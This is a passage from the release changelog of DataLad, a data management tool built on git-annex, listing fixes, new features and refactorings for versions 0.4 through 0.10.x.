regular Git files. A new approach fixes this and resolves a good\n number of known failures.\n (`#2770 <https://github.com/datalad/datalad/issues/2770>`__)\n- The reporting of command results failed if the current working\n directory was removed (e.g., after an unsuccessful ``install``).\n (`#2788 <https://github.com/datalad/datalad/issues/2788>`__)\n- When installing into an existing empty directory, ``datalad install``\n removed the directory after a failed clone.\n (`#2788 <https://github.com/datalad/datalad/issues/2788>`__)\n- ``datalad run`` incorrectly handled inputs and outputs for paths with\n spaces and other characters that require shell escaping.\n (`#2798 <https://github.com/datalad/datalad/issues/2798>`__)\n- Globbing inputs and outputs for ``datalad run`` didn’t work correctly\n if a subdataset wasn’t installed.\n (`#2796 <https://github.com/datalad/datalad/issues/2796>`__)\n- Minor (in)compatibility with git 2.19 - (no) trailing period in an\n error message now.\n (`#2815 <https://github.com/datalad/datalad/issues/2815>`__)\n\n.. 
_enhancements-and-new-features-35:\n\nEnhancements and new features\n-----------------------------\n\n- Anonymous access is now supported for S3 and other downloaders.\n (`#2708 <https://github.com/datalad/datalad/issues/2708>`__)\n- A new interface is available to ease setting up new providers.\n (`#2708 <https://github.com/datalad/datalad/issues/2708>`__)\n- Metadata: changes to egrep mode search\n (`#2735 <https://github.com/datalad/datalad/issues/2735>`__)\n\n - Queries in egrep mode are now case-sensitive when the query\n contains any uppercase letters and are case-insensitive otherwise.\n The new mode egrepcs can be used to perform a case-sensitive query\n with all lower-case letters.\n - Search can now be limited to a specific key.\n - Multiple queries (list of expressions) are evaluated using AND to\n determine whether something is a hit.\n - A single multi-field query (e.g., ``pa*:findme``) is a hit, when\n any matching field matches the query.\n - All matching key/value combinations across all (multi-field)\n queries are reported in the query_matched result field.\n - egrep mode now shows all hits rather than limiting the results to\n the top 20 hits.\n\n- The documentation on how to format commands for ``datalad run`` has\n been improved.\n (`#2703 <https://github.com/datalad/datalad/issues/2703>`__)\n- The method for determining the current working directory on Windows\n has been improved.\n (`#2707 <https://github.com/datalad/datalad/issues/2707>`__)\n- ``datalad --version`` now simply shows the version without the\n license. (`#2733 <https://github.com/datalad/datalad/issues/2733>`__)\n- ``datalad export-archive`` learned to export under an existing\n directory via its ``--filename`` option.\n (`#2723 <https://github.com/datalad/datalad/issues/2723>`__)\n- ``datalad export-to-figshare`` now generates the zip archive in the\n root of the dataset unless ``--filename`` is specified.\n (`#2723 <https://github.com/datalad/datalad/issues/2723>`__)\n- After importing ``datalad.api``, ``help(datalad.api)`` (or\n ``datalad.api?`` in IPython) now shows a summary of the available\n DataLad commands.\n (`#2728 <https://github.com/datalad/datalad/issues/2728>`__)\n- Support for using ``datalad`` from IPython has been improved.\n (`#2722 <https://github.com/datalad/datalad/issues/2722>`__)\n- ``datalad wtf`` now returns structured data and reports the version\n of each extension.\n (`#2741 <https://github.com/datalad/datalad/issues/2741>`__)\n- The internal handling of gitattributes information has been improved.\n A user-visible consequence is that ``datalad create --force`` no\n longer duplicates existing attributes.\n (`#2744 <https://github.com/datalad/datalad/issues/2744>`__)\n- The “annex” metadata extractor can now be used even when no content\n is present.\n (`#2724 <https://github.com/datalad/datalad/issues/2724>`__)\n- The ``add_url_to_file`` method (called by commands like\n ``datalad download-url`` and ``datalad add-archive-content``)\n learned how to display a progress bar.\n (`#2738 <https://github.com/datalad/datalad/issues/2738>`__)\n\n0.10.2 (Jul 09, 2018) – Thesecuriestever\n========================================\n\nPrimarily a bugfix release to accommodate recent git-annex release\nforbidding file:// and http://localhost/ URLs which might lead to\nrevealing private files if annex is publicly shared.\n\n.. 
_fixes-36:\n\nFixes\n-----\n\n- fixed testing to be compatible with recent git-annex (6.20180626)\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n will now download to current directory instead of the top of the\n dataset\n\n.. _enhancements-and-new-features-36:\n\nEnhancements and new features\n-----------------------------\n\n- do not quote ~ in URLs to be consistent with quote implementation in\n Python 3.7 which now follows RFC 3986\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n support for user-configured placeholder values\n- documentation on native git-annex metadata support\n- handle 401 errors from LORIS tokens\n- ``yoda`` procedure will instantiate ``README.md``\n- ``--discover`` option added to\n `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n to list available procedures\n\n0.10.1 (Jun 17, 2018) – OHBM polish\n===================================\n\nThe is a minor bugfix release.\n\n.. _fixes-37:\n\nFixes\n-----\n\n- Be able to use backports.lzma as a drop-in replacement for pyliblzma.\n- Give help when not specifying a procedure name in ``run-procedure``.\n- Abort early when a downloader received no filename.\n- Avoid ``rerun`` error when trying to unlock non-available files.\n\n0.10.0 (Jun 09, 2018) – The Release\n===================================\n\nThis release is a major leap forward in metadata support.\n\n.. _major-refactoring-and-deprecations-12:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- Metadata\n\n - Prior metadata provided by datasets under ``.datalad/meta`` is no\n longer used or supported. Metadata must be reaggregated using 0.10\n version\n - Metadata extractor types are no longer auto-guessed and must be\n explicitly specified in ``datalad.metadata.nativetype`` config\n (could contain multiple values)\n - Metadata aggregation of a dataset hierarchy no longer updates all\n datasets in the tree with new metadata. Instead, only the target\n dataset is updated. This behavior can be changed via the\n –update-mode switch. The new default prevents needless\n modification of (3rd-party) subdatasets.\n - Neuroimaging metadata support has been moved into a dedicated\n extension: https://github.com/datalad/datalad-neuroimaging\n\n- Crawler\n\n - moved into a dedicated extension:\n https://github.com/datalad/datalad-crawler\n\n- ``export_tarball`` plugin has been generalized to ``export_archive``\n and can now also generate ZIP archives.\n- By default a dataset X is now only considered to be a super-dataset\n of another dataset Y, if Y is also a registered subdataset of X.\n\n.. _fixes-38:\n\nFixes\n-----\n\nA number of fixes did not make it into the 0.9.x series:\n\n- Dynamic configuration overrides via the ``-c`` option were not in\n effect.\n- ``save`` is now more robust with respect to invocation in\n subdirectories of a dataset.\n- ``unlock`` now reports correct paths when running in a dataset\n subdirectory.\n- ``get`` is more robust to path that contain symbolic links.\n- symlinks to subdatasets of a dataset are now correctly treated as a\n symlink, and not as a subdataset\n- ``add`` now correctly saves staged subdataset additions.\n- Running ``datalad save`` in a dataset no longer adds untracked\n content to the dataset. In order to add content a path has to be\n given, e.g. 
``datalad save .``\n- ``wtf`` now works reliably with a DataLad that wasn’t installed from\n Git (but, e.g., via pip)\n- More robust URL handling in ``simple_with_archives`` crawler\n pipeline.\n\n.. _enhancements-and-new-features-37:\n\nEnhancements and new features\n-----------------------------\n\n- Support for DataLad extension that can contribute API components from\n 3rd-party sources, incl. commands, metadata extractors, and test case\n implementations. See\n https://github.com/datalad/datalad-extension-template for a demo\n extension.\n- Metadata (everything has changed!)\n\n - Metadata extraction and aggregation is now supported for datasets\n and individual files.\n - Metadata query via ``search`` can now discover individual files.\n - Extracted metadata can now be stored in XZ compressed files, is\n optionally annexed (when exceeding a configurable size threshold),\n and obtained on demand (new configuration option\n ``datalad.metadata.create-aggregate-annex-limit``).\n - Status and availability of aggregated metadata can now be reported\n via ``metadata --get-aggregates``\n - New configuration option ``datalad.metadata.maxfieldsize`` to\n exclude too large metadata fields from aggregation.\n - The type of metadata is no longer guessed during metadata\n extraction. A new configuration option\n ``datalad.metadata.nativetype`` was introduced to enable one or\n more particular metadata extractors for a dataset.\n - New configuration option\n ``datalad.metadata.store-aggregate-content`` to enable the storage\n of aggregated metadata for dataset content (i.e. file-based\n metadata) in contrast to just metadata describing a dataset as a\n whole.\n\n- ``search`` was completely reimplemented. It offers three different\n modes now:\n\n - ‘egrep’ (default): expression matching in a plain string version\n of metadata\n - ‘textblob’: search a text version of all metadata using a fully\n featured query language (fast indexing, good for keyword search)\n - ‘autofield’: search an auto-generated index that preserves\n individual fields of metadata that can be represented in a tabular\n structure (substantial indexing cost, enables the most detailed\n queries of all modes)\n\n- New extensions:\n\n - `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__,\n an extension for creating a dataset (and possibly subdatasets)\n from a list of URLs.\n - export_to_figshare\n - extract_metadata\n\n- add_readme makes use of available metadata\n- By default the wtf extension now hides sensitive information, which\n can be included in the output by passing ``--senstive=some`` or\n ``--senstive=all``.\n- Reduced startup latency by only importing commands necessary for a\n particular command line call.\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__:\n\n - ``-d <parent> --nosave`` now registers subdatasets, when possible.\n - ``--fake-dates`` configures dataset to use fake-dates\n\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n now provides a way for the caller to save the result when a command\n has a non-zero exit status.\n- ``datalad rerun`` now has a ``--script`` option that can be used to\n extract previous commands into a file.\n- A DataLad Singularity container is now available on `Singularity\n Hub <https://singularity-hub.org/collections/667>`__.\n- More casts have been embedded in the `use case section of the\n documentation <http://docs.datalad.org/en/docs/usecases/index.html>`__.\n- 
``datalad --report-status`` has a new value ‘all’ that can be used to\n temporarily re-enable reporting that was disable by configuration\n settings.\n\n0.9.3 (Mar 16, 2018) – pi+0.02 release\n======================================\n\nSome important bug fixes which should improve usability\n\n.. _fixes-39:\n\nFixes\n-----\n\n- ``datalad-archives`` special remote now will lock on acquiring or\n extracting an archive - this allows for it to be used with -J flag\n for parallel operation\n- relax introduced in 0.9.2 demand on git being configured for datalad\n operation - now we will just issue a warning\n- ``datalad ls`` should now list “authored date” and work also for\n datasets in detached HEAD mode\n- ``datalad save`` will now save original file as well, if file was\n “git mv”ed, so you can now ``datalad run git mv old new`` and have\n changes recorded\n\n.. _enhancements-and-new-features-38:\n\nEnhancements and new features\n-----------------------------\n\n- ``--jobs`` argument now could take ``auto`` value which would decide\n on # of jobs depending on the # of available CPUs. ``git-annex`` >\n 6.20180314 is recommended to avoid regression with -J.\n- memoize calls to ``RI`` meta-constructor – should speed up operation\n a bit\n- ``DATALAD_SEED`` environment variable could be used to seed Python\n RNG and provide reproducible UUIDs etc (useful for testing and demos)\n\n0.9.2 (Mar 04, 2018) – it is (again) better than ever\n=====================================================\n\nLargely a bugfix release with a few enhancements.\n\n.. _fixes-40:\n\nFixes\n-----\n\n- Execution of external commands (git) should not get stuck when lots\n of both stdout and stderr output, and should not loose remaining\n output in some cases\n- Config overrides provided in the command line (-c) should now be\n handled correctly\n- Consider more remotes (not just tracking one, which might be none)\n while installing subdatasets\n- Compatibility with git 2.16 with some changed behaviors/annotations\n for submodules\n- Fail ``remove`` if ``annex drop`` failed\n- Do not fail operating on files which start with dash (-)\n- URL unquote paths within S3, URLs and DataLad RIs (///)\n- In non-interactive mode fail if authentication/access fails\n- Web UI:\n\n - refactored a little to fix incorrect listing of submodules in\n subdirectories\n - now auto-focuses on search edit box upon entering the page\n\n- Assure that extracted from tarballs directories have executable bit\n set\n\n.. _enhancements-and-new-features-39:\n\nEnhancements and new features\n-----------------------------\n\n- A log message and progress bar will now inform if a tarball to be\n downloaded while getting specific files (requires git-annex >\n 6.20180206)\n- A dedicated ``datalad rerun`` command capable of rerunning entire\n sequences of previously ``run`` commands. **Reproducibility through\n VCS. Use ``run`` even if not interested in ``rerun``**\n- Alert the user if ``git`` is not yet configured but git operations\n are requested\n- Delay collection of previous ssh connections until it is actually\n needed. 
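A minimal sketch of the ``run``/``rerun`` pairing advertised above, assuming an already existing dataset at an invented path and an arbitrary example command::

   import datalad.api as dl

   ds_path = '/tmp/demo-ds'                  # hypothetical existing dataset
   dl.run('date > timestamp.txt',
          dataset=ds_path,
          message='record current time')     # captured as a run commit
   dl.rerun(dataset=ds_path)                 # re-execute the most recent run commit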
Also do not require ‘:’ while specifying ssh host\n- AutomagicIO: Added proxying of isfile, lzma.LZMAFile and io.open\n- Testing:\n\n - added DATALAD_DATASETS_TOPURL=http://datasets-tests.datalad.org to\n run tests against another website to not obscure access stats\n - tests run against temporary HOME to avoid side-effects\n - better unit-testing of interactions with special remotes\n\n- CONTRIBUTING.md describes how to setup and use ``git-hub`` tool to\n “attach” commits to an issue making it into a PR\n- DATALAD_USE_DEFAULT_GIT env variable could be used to cause DataLad\n to use default (not the one possibly bundled with git-annex) git\n- Be more robust while handling not supported requests by annex in\n special remotes\n- Use of ``swallow_logs`` in the code was refactored away – less\n mysteries now, just increase logging level\n- ``wtf`` plugin will report more information about environment,\n externals and the system\n\n0.9.1 (Oct 01, 2017) – “DATALAD!”(JBTM)\n=======================================\n\nMinor bugfix release\n\n.. _fixes-41:\n\nFixes\n-----\n\n- Should work correctly with subdatasets named as numbers of bool\n values (requires also GitPython >= 2.1.6)\n- Custom special remotes should work without crashing with git-annex >=\n 6.20170924\n\n0.9.0 (Sep 19, 2017) – isn’t it a lucky day even though not a Friday?\n=====================================================================\n\n.. _major-refactoring-and-deprecations-13:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- the ``files`` argument of\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n has been renamed to ``path`` to be uniform with any other command\n- all major commands now implement more uniform API semantics and\n result reporting. Functionality for modification detection of dataset\n content has been completely replaced with a more efficient\n implementation\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n now features a ``--transfer-data`` switch that allows for a\n disambiguous specification of whether to publish data – independent\n of the selection which datasets to publish (which is done via their\n paths). Moreover,\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n now transfers data before repository content is pushed.\n\n.. 
_fixes-42:\n\nFixes\n-----\n\n- `drop <http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html>`__\n no longer errors when some subdatasets are not installed\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n will no longer report nothing when a Dataset instance was given as a\n source argument, but rather perform as expected\n- `remove <http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html>`__\n doesn’t remove when some files of a dataset could not be dropped\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n\n - no longer hides error during a repository push\n - publish behaves “correctly” for ``--since=`` in considering only\n the differences the last “pushed” state\n - data transfer handling while publishing with dependencies, to\n github\n\n- improved robustness with broken Git configuration\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n should search for unicode strings correctly and not crash\n- robustify git-annex special remotes protocol handling to allow for\n spaces in the last argument\n- UI credentials interface should now allow to Ctrl-C the entry\n- should not fail while operating on submodules named with numerics\n only or by bool (true/false) names\n- crawl templates should not now override settings for ``largefiles``\n if specified in ``.gitattributes``\n\n.. _enhancements-and-new-features-40:\n\nEnhancements and new features\n-----------------------------\n\n- **Exciting new feature**\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n command to protocol execution of an external command and rerun\n computation if desired. See\n `screencast <http://datalad.org/features.html#reproducible-science>`__\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n now uses Git for detecting with sundatasets need to be inspected for\n potential changes, instead of performing a complete traversal of a\n dataset tree\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n looks for changes relative to the last committed state of a dataset\n to discover files to add more efficiently\n- `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n can now report untracked files in addition to modified files\n- [uninstall][] will check itself whether a subdataset is properly\n registered in a superdataset, even when no superdataset is given in a\n call\n- `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n can now configure subdatasets for exclusion from recursive\n installation (``datalad-recursiveinstall`` submodule configuration\n property)\n- precrafted pipelines of [crawl][] now will not override\n ``annex.largefiles`` setting if any was set within ``.gitattribues``\n (e.g. by ``datalad create --text-no-annex``)\n- framework for screencasts: ``tools/cast*`` tools and sample cast\n scripts under ``doc/casts`` which are published at\n `datalad.org/features.html <http://datalad.org/features.html>`__\n- new `project YouTube\n channel <https://www.youtube.com/channel/UCB8-Zf7D0DSzAsREoIt0Bvw>`__\n- tests failing in direct and/or v6 modes marked explicitly\n\n0.8.1 (Aug 13, 2017) – the best birthday gift\n=============================================\n\nBugfixes\n\n.. 
_fixes-43:\n\nFixes\n-----\n\n- Do not attempt to\n `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n a not installed sub-dataset\n- In case of too many files to be specified for\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n or\n `copy_to <http://docs.datalad.org/en/latest/_modules/datalad/support/annexrepo.html?highlight=%22copy_to%22>`__,\n we will make multiple invocations of underlying git-annex command to\n not overfill command line\n- More robust handling of unicode output in terminals which might not\n support it\n\n.. _enhancements-and-new-features-41:\n\nEnhancements and new features\n-----------------------------\n\n- Ship a copy of numpy.testing to facilitate [test][] without requiring\n numpy as dependency. Also allow to pass to command which test(s) to\n run\n- In\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n and\n `copy_to <http://docs.datalad.org/en/latest/_modules/datalad/support/annexrepo.html?highlight=%22copy_to%22>`__\n provide actual original requested paths, not the ones we deduced need\n to be transferred, solely for knowing the total\n\n0.8.0 (Jul 31, 2017) – it is better than ever\n=============================================\n\nA variety of fixes and enhancements\n\n.. _fixes-44:\n\nFixes\n-----\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n would now push merged ``git-annex`` branch even if no other changes\n were done\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n should be able to publish using relative path within SSH URI (git\n hook would use relative paths)\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n should better tollerate publishing to pure git and ``git-annex``\n special remotes\n\n.. _enhancements-and-new-features-42:\n\nEnhancements and new features\n-----------------------------\n\n- `plugin <http://datalad.readthedocs.io/en/latest/generated/man/datalad-plugin.html>`__\n mechanism came to replace\n `export <http://datalad.readthedocs.io/en/latest/generated/man/datalad-export.html>`__.\n See\n `export_tarball <http://docs.datalad.org/en/latest/generated/datalad.plugin.export_tarball.html>`__\n for the replacement of\n `export <http://datalad.readthedocs.io/en/latest/generated/man/datalad-export.html>`__.\n Now it should be easy to extend datalad’s interface with custom\n functionality to be invoked along with other commands.\n- Minimalistic coloring of the results rendering\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__/``copy_to``\n got progress bar report now and support of ``--jobs``\n- minor fixes and enhancements to crawler (e.g. support of recursive\n removes)\n\n0.7.0 (Jun 25, 2017) – when it works - it is quite awesome!\n===========================================================\n\nNew features, refactorings, and bug fixes.\n\n.. 
_major-refactoring-and-deprecations-14:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- `add-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add-sibling.html>`__\n has been fully replaced by the\n `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n command\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__,\n and\n `unlock <http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html>`__\n have been re-written to support the same common API as most other\n commands\n\n.. _enhancements-and-new-features-43:\n\nEnhancements and new features\n-----------------------------\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n can now be used to query and configure a local repository by using\n the sibling name ``here``\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n can now query and set annex preferred content configuration. This\n includes ``wanted`` (as previously supported in other commands), and\n now also ``required``\n- New\n `metadata <http://datalad.readthedocs.io/en/latest/generated/man/datalad-metadata.html>`__\n command to interface with datasets/files\n `meta-data <http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling>`__\n- Documentation for all commands is now built in a uniform fashion\n- Significant parts of the documentation of been updated\n- Instantiate GitPython’s Repo instances lazily\n\n.. _fixes-45:\n\nFixes\n-----\n\n- API documentation is now rendered properly as HTML, and is easier to\n browse by having more compact pages\n- Closed files left open on various occasions (Popen PIPEs, etc)\n- Restored basic (consumer mode of operation) compatibility with\n Windows OS\n\n0.6.0 (Jun 14, 2017) – German perfectionism\n===========================================\n\nThis release includes a **huge** refactoring to make code base and\nfunctionality more robust and flexible\n\n- outputs from API commands could now be highly customized. See\n ``--output-format``, ``--report-status``, ``--report-type``, and\n ``--report-type`` options for\n `datalad <http://docs.datalad.org/en/latest/generated/man/datalad.html>`__\n command.\n- effort was made to refactor code base so that underlying functions\n behave as generators where possible\n- input paths/arguments analysis was redone for majority of the\n commands to provide unified behavior\n\n.. _major-refactoring-and-deprecations-15:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- ``add-sibling`` and ``rewrite-urls`` were refactored in favor of new\n `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n command which should be used for siblings manipulations\n- ‘datalad.api.alwaysrender’ config setting/support is removed in favor\n of new outputs processing\n\n.. _fixes-46:\n\nFixes\n-----\n\n- Do not flush manually git index in pre-commit to avoid “Death by the\n Lock” issue\n- Deployed by\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n ``post-update`` hook script now should be more robust (tolerate\n directory names with spaces, etc.)\n- A variety of fixes, see `list of pull requests and issues\n closed <https://github.com/datalad/datalad/milestone/41?closed=1>`__\n for more information\n\n.. 
_enhancements-and-new-features-44:\n\nEnhancements and new features\n-----------------------------\n\n- new\n `annotate-paths <http://docs.datalad.org/en/latest/generated/man/datalad-annotate-paths.html>`__\n plumbing command to inspect and annotate provided paths. Use\n ``--modified`` to summarize changes between different points in the\n history\n- new\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n plumbing command to provide a subset (install a single dataset from a\n URL) functionality of\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n- new\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n plumbing command\n- new\n `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n command to list or manipulate siblings\n- new\n `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n command to list subdatasets and their properties\n- `drop <http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html>`__\n and\n `remove <http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html>`__\n commands were refactored\n- ``benchmarks/`` collection of `Airspeed\n velocity <https://github.com/spacetelescope/asv/>`__ benchmarks\n initiated. See reports at http://datalad.github.io/datalad/\n- crawler would try to download a new url multiple times increasing\n delay between attempts. Helps to resolve problems with extended\n crawls of Amazon S3\n- `CRCNS <http://crcns.org>`__ crawler pipeline now also fetches and\n aggregates meta-data for the datasets from datacite\n- overall optimisations to benefit from the aforementioned refactoring\n and improve user-experience\n- a few stub and not (yet) implemented commands (e.g. ``move``) were\n removed from the interface\n- Web frontend got proper coloring for the breadcrumbs and some\n additional caching to speed up interactions. See\n http://datasets.datalad.org\n- Small improvements to the online documentation. See e.g. `summary of\n differences between\n git/git-annex/datalad <http://docs.datalad.org/en/latest/related.html#git-git-annex-datalad>`__\n\n0.5.1 (Mar 25, 2017) – cannot stop the progress\n===============================================\n\nA bugfix release\n\n.. _fixes-47:\n\nFixes\n-----\n\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n was forcing addition of files to annex regardless of settings in\n ``.gitattributes``. Now that decision is left to annex by default\n- ``tools/testing/run_doc_examples`` used to run doc examples as tests,\n fixed up to provide status per each example and not fail at once\n- ``doc/examples``\n\n - `3rdparty_analysis_workflow.sh <http://docs.datalad.org/en/latest/generated/examples/3rdparty_analysis_workflow.html>`__\n was fixed up to reflect changes in the API of 0.5.0.\n\n- progress bars\n\n - should no longer crash **datalad** and report correct sizes and\n speeds\n - should provide progress reports while using Python 3.x\n\n.. 
_enhancements-and-new-features-45:\n\nEnhancements and new features\n-----------------------------\n\n- ``doc/examples``\n\n - `nipype_workshop_dataset.sh <http://docs.datalad.org/en/latest/generated/examples/nipype_workshop_dataset.html>`__\n new example to demonstrate how new super- and sub- datasets were\n established as a part of our datasets collection\n\n0.5.0 (Mar 20, 2017) – it’s huge\n================================\n\nThis release includes an avalanche of bug fixes, enhancements, and\nadditions which at large should stay consistent with previous behavior\nbut provide better functioning. Lots of code was refactored to provide\nmore consistent code-base, and some API breakage has happened. Further\nwork is ongoing to standardize output and results reporting\n(`#1350 <https://github.com/datalad/datalad/issues/1350>`__)\n\nMost notable changes\n--------------------\n\n- requires `git-annex <http://git-annex.branchable.com/>`__ >=\n 6.20161210 (or better even >= 6.20161210 for improved functionality)\n- commands should now operate on paths specified (if any), without\n causing side-effects on other dirty/staged files\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n\n - ``-a`` is deprecated in favor of ``-u`` or ``--all-updates`` so\n only changes known components get saved, and no new files\n automagically added\n - ``-S`` does no longer store the originating dataset in its commit\n message\n\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n\n - can specify commit/save message with ``-m``\n\n- `add-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add-sibling.html>`__\n and\n `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n\n - now take the name of the sibling (remote) as a ``-s`` (``--name``)\n option, not a positional argument\n - ``--publish-depends`` to setup publishing data and code to\n multiple repositories (e.g. github + webserve) should now be\n functional see `this\n comment <https://github.com/datalad/datalad/issues/335#issuecomment-277240733>`__\n - got ``--publish-by-default`` to specify what refs should be\n published by default\n - got ``--annex-wanted``, ``--annex-groupwanted`` and\n ``--annex-group`` settings which would be used to instruct annex\n about preferred content.\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n then will publish data using those settings if ``wanted`` is set.\n - got ``--inherit`` option to automagically figure out url/wanted\n and other git/annex settings for new remote sub-dataset to be\n constructed\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n\n - got ``--skip-failing`` refactored into ``--missing`` option which\n could use new feature of\n `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n ``--inherit``\n\n.. _fixes-48:\n\nFixes\n-----\n\n- More consistent interaction through ssh - all ssh connections go\n through\n `sshrun <http://datalad.readthedocs.io/en/latest/generated/man/datalad-sshrun.html>`__\n shim for a “single point of authentication”, etc.\n- More robust\n `ls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-ls.html>`__\n operation outside of the datasets\n- A number of fixes for direct and v6 mode of annex\n\n.. 
_enhancements-and-new-features-46:\n\nEnhancements and new features\n-----------------------------\n\n- New\n `drop <http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html>`__\n and\n `remove <http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html>`__\n commands\n- `clean <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clean.html>`__\n\n - got ``--what`` to specify explicitly what cleaning steps to\n perform and now could be invoked with ``-r``\n\n- ``datalad`` and ``git-annex-remote*`` scripts now do not use\n setuptools entry points mechanism and rely on simple import to\n shorten start up time\n- `Dataset <http://docs.datalad.org/en/latest/generated/datalad.api.Dataset.html>`__\n is also now using `Flyweight\n pattern <https://en.wikipedia.org/wiki/Flyweight_pattern>`__, so the\n same instance is reused for the same dataset\n- progressbars should not add more empty lines\n\nInternal refactoring\n--------------------\n\n- Majority of the commands now go through ``_prep`` for arguments\n validation and pre-processing to avoid recursive invocations\n\n0.4.1 (Nov 10, 2016) – CA release\n=================================\n\nRequires now GitPython >= 2.1.0\n\n.. _fixes-49:\n\nFixes\n-----\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n\n - to not save staged files if explicit paths were provided\n\n- improved (but not yet complete) support for direct mode\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n to not crash if some sub-datasets are not installed\n- do not log calls to ``git config`` to avoid leakage of possibly\n sensitive settings to the logs\n\n.. _enhancements-and-new-features-47:\n\nEnhancements and new features\n-----------------------------\n\n- New `rfc822-compliant\n metadata <http://docs.datalad.org/en/latest/metadata.html#rfc822-compliant-meta-data>`__\n format\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n\n - -S to save the change also within all super-datasets\n\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n now has progress-bar reporting\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n to create a :term:``sibling`` of a dataset on github\n- `OpenfMRI <http://openfmri.org>`__ crawler and datasets were enriched\n with URLs to separate files where also available from openfmri s3\n bucket (if upgrading your datalad datasets, you might need to run\n ``git annex enableremote datalad`` to make them available)\n- various enhancements to log messages\n- web interface\n\n - populates “install” box first thus making UX better over slower\n connections\n\n0.4 (Oct 22, 2016) – Paris is waiting\n=====================================\n\nPrimarily it is a bugfix release but because of significant refactoring\nof the\n`install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\nand\n`get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\nimplementation, it gets a new minor release.\n\n.. 
